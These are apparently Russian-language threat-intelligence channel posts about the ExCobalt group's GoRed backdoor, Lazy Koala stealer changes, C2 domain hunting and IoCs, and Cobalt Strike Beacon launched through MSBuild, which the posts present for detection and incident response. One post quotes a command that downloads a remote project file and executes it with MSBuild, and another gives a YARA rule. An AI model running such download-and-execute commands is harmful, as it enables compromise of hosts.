❕ Группировка ExCobalt использует новый инструмент GoRed

В ходе реагирования на инцидент у нашего клиента на одном из Linux-узлов мы обнаружили файл с названием scrond, «накрытый» UPX (Ultimate Packer for eXecutables).

Файл оказался бэкдором, написанным на языке Go и по своим функциям напоминающим компоненты фреймворков Sliver и Cobalt Strike. Распаковав его, мы нашли пути к пакетам, содержащие подстроку:

red.team/go-red/

Она тонко намекает на название инструмента (GoRed) и его создателей в лице red[.]team. Предположительно, у них есть сайт, который больше напоминает визитку, чем что-то значимое и относящееся к атаке. По нашим данным, инструмент активно дорабатывается по меньшей мере с 2023 года: при реагировании на один из прошлых инцидентов мы встретили версию 0.0.1 (сейчас — 0.1.4).

В процессе дальнейшего исследования мы убедились, что инструмент используется группой ExCobalt: есть инфраструктурные пересечения с индикаторами, которые описаны в нашем предыдущем отчете.

💡 Что это за группировка

ExCobalt — киберпреступная группа, сосредоточенная на шпионаже. Некоторые ее члены активны как минимум с 2016 года и, предположительно, состояли в небезызвестной группе Cobalt.

Cobalt атаковала кредитно-финансовые организации с целью кражи денежных средств. Отличительной особенностью группировки было использование инструмента CobInt, который в 2022 году в некоторых атаках начала применять и ExCobalt.

🎯 На кого нацелены атаки

За последний год специалисты PT ESC фиксировали атаки и расследовали инциденты, связанные с группой ExCobalt, в российских организациях из следующих отраслей экономики:

• Металлургия
• Телекоммуникации
• Горная промышленность
• Информационные технологии
• Государственные учреждения
• Разработка ПО

Полное техническое описание инструмента GoRed, а также индикаторы компрометации можно найти на нашем сайте.

#APT
@ptescalator

Метаморфоза Lazy Koala. Была Koala 🐨 — стала Capybara 😎

В мае этого года были зафиксированы новые атаки группировки Lazy Koala на Азербайджан, Беларусь и Узбекистан.

В случае атак на Азербайджан и Беларусь изменился формат отправляемых в бот сообщений, также хакеры отказались от использования единого аккаунта в атаках и изменили ник с Koala на Capybara.

Традиционно при запуске ВПО группы происходит открытие встроенного документа, который отвлекает внимание жертвы и содержит актуальную региональную новость (пример — на скриншоте).

Немного изменился и LazyStealer, теперь PYD-файлы (в которых хранится приманка) называются по-новому:

CapybaraPDF.cp39-win_amd64.pyd

Также в имени основного скрипта указывается сокращение названия атакуемый страны:

bls.py, az.py

Помимо протектора Pyarmor, был добавлен еще один уровень защиты: теперь данные закодированы в base64 и сжаты zlib; после снятия всей обфускации скрипт запускается через exec. Деобфусцированный скрипт имеет ту же функциональность, но его структура и сами имена функций немного изменены.

В случае атак на Узбекистан изменения были следующие:

• Теперь в инфраструктуре C2 вместо телеграм-бота используется хостинг.
• В качестве приманки вместо PDF-файла злоумышленники отправляют DOCX-файл.

IoCs:

601f11b308286673d9022df4e875cf86be71235b6a413d63dfd0d0f553c4bed8

42f79b6ede5e6d048a9bf419f5751ff1d4046e7a656a84fab4e97fdfb1ed4f0d

da91f1f8279edae524ce98df0b6d1aca52336f723e3b8bcb7c8a0933c4b2eb0d

@ptescalator

Проактивный хантинг C2-серверов 👨‍💻

В процессе хантинга C2-серверов появляется важный вопрос — какие артефакты использовать для лучшей результативности и точности: искать по WHOIS-записям, регулярным выражениям для субдоменов, по NS-серверам, DDNS, резолвам на один IP-адрес и т. п. С этой точки зрения лучшим чаще всего является фингерпринт SSL-сертификата, используемого на C2-сервере.

Благодаря мониторингу фингерпринта сертификата через Censys,

services.tls.certificate.fingerprint_sha256: "aea6e20b6abcf58c27eab43de08d7b1cd988fc68c471b5cdcc812851df8c8748"

который мы ранее видели на C2-сервере, используемом GoRed в атаках на российские организации, в июне этого года был обнаружен новый C2-сервер GoRed, а также дополнительные сетевые индикаторы.

IoC:

passwade.ru
dnslan.ru
wglan.ru
mskde.ru
mskde.online
myldap.ru

#TI #ExCobalt #GoRed #C2
@ptescalator

🥷 Cobalt Strike Beacon и MSBuild

Практика наших расследований инцидентов показывает, что злоумышленники все еще используют Microsoft Build Engine для компиляции .NET и запуска Cobalt Strike Beacon на скомпрометированных узлах.

Предварительно на хост загружается конфигурация проекта .NET, представленная в формате XML. Конфигурация содержит в себе встроенную задачу.

Код задачи описан в структуре:

<Task> <Code Type="Fragment" Language="cs"> <![CDATA[...]]> </Code> </Task>

Задача — это блок исполняемого кода, с помощью которого MSBuild выполняет атомарные операции, которые используются разработчиками в процессе сборки проектов. В рассматриваемом случае злоумышленники используют данный механизм для запуска ВПО.

После успешной загрузки конфигурации запускается MSBuild, где параметром указан путь до конфигурации проекта. В результате на скомпрометированном хосте компилируется и запускается .NET библиотека. Она расшифровывает полезную нагрузку и вызывает функцию EnumChildWindows, которая исполняет шелл-код.

Пример запуска:

wget https://maliciouswebsite[.]com/doWqkwoown/update.csproj -O C:\Windows\Temp\update.csproj; C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\update.csproj

Yara:

rule Susp_Microsoft_Build_Engine_XML_Schema {
  strings:
    $s1 = "TaskFactory=\"CodeTaskFactory" 
    $s2 = "VirtualAllocEx(0xFFFFFFFF, 0, (UInt32)"
    $e1 = "EnumChildWindows" 
    $e2 = "EnumDisplayMonitors" 
  condition:
    all of ($s*) and any of ($e*)
}

Дополнительные материалы 👈

#dfir #hunt #detect #yara #win
@ptescalator